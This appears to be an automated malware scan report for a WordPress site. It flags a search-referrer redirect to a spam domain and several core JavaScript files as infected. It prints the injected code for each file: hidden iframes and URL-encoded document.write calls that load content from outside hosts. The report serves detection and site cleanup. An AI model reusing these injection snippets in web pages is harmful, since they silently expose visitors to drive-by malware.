Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://nobsim.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: nobsim.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Sep 2014 12:29:24 GMT Location: http://nopillnosteel.com/ Server: nginx/1.6.2 Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://nobsim.com/ | 200 OK Content-Length: 6479 Content-Type: text/html | clean |
http://nobsim.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 762 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://condominioedificiobrasil.com/wp-includes/class-wp-ajax.php" width="13" height="14" frameborder="0" style="visibility: hidden; display: none"></iframe>');
document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); Antivirus reports:
| ||
http://nobsim.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.8.16 | 200 OK Content-Length: 7101 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c,j){function k(a,b){var d=a.nodeName.toLowerCase();if("area"===d){b=a.parentNode;d=b.name;if(!a.href||!d||b.nodeName.toLowerCase()!=="map")return false;a=c("img[usemap=#"+d+"]")[0];return!!a&&l(a)}return(/input|select|textarea|button|object/.test(d)?!a.disabled:"a"==d?a.href||b:b)&a document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); Antivirus reports:
| ||
http://nobsim.com/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.8.16 | 200 OK Content-Length: 58678 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d,C){function M(){this.debug=false;this._curInst=null;this._keyEvent=false;this._disabledInputs=[];this._inDialog=this._datepickerShowing=false;this._mainDivId="ui-datepicker-div";this._inlineClass="ui-datepicker-inline";this._appendClass="ui-datepicker-append";this._triggerClass="ui-datepicker-trigger";this._dialogClass="ui-datepicker document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); Antivirus reports:
| ||
http://nobsim.com/?page_id=2 | 200 OK Content-Length: 9412 Content-Type: text/html | clean |
http://nobsim.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 1910 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.styl document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); Antivirus reports:
| ||
http://nobsim.com/?author=1 | 200 OK Content-Length: 6807 Content-Type: text/html | clean |
http://nobsim.com/?p=1 | 200 OK Content-Length: 10027 Content-Type: text/html | clean |
http://nobsim.com/?cat=1 | 200 OK Content-Length: 6755 Content-Type: text/html | clean |
http://nobsim.com/?m=201308 | 200 OK Content-Length: 6553 Content-Type: text/html | clean |
http://nobsim.com/wp-login.php | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://nobsim.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 12:29:36 GMT Location: http://nopillnosteel.com/ Server: nginx/1.6.2 Content-Length: 269 Content-Type: text/html; charset=iso-8859-1 | clean |
http://nopillnosteel.com/ | 500 Can't connect to nopillnosteel.com:80 (Bad hostname) Content-Length: 166 Content-Type: text/plain | clean |
http://nopillnosteel.com/test404page.js | 500 Can't connect to nopillnosteel.com:80 (Bad hostname) Content-Length: 166 Content-Type: text/plain | clean |
http://nobsim.com/?feed=rss2 | 200 OK Content-Length: 1526 Content-Type: text/xml | clean |
http://nobsim.com/?feed=comments-rss2 | 200 OK Content-Length: 1372 Content-Type: text/xml | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nobsim.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nobsim.com/
Result: nobsim.com is not infected or malware details are not published yet.
Result: nobsim.com is not infected or malware details are not published yet.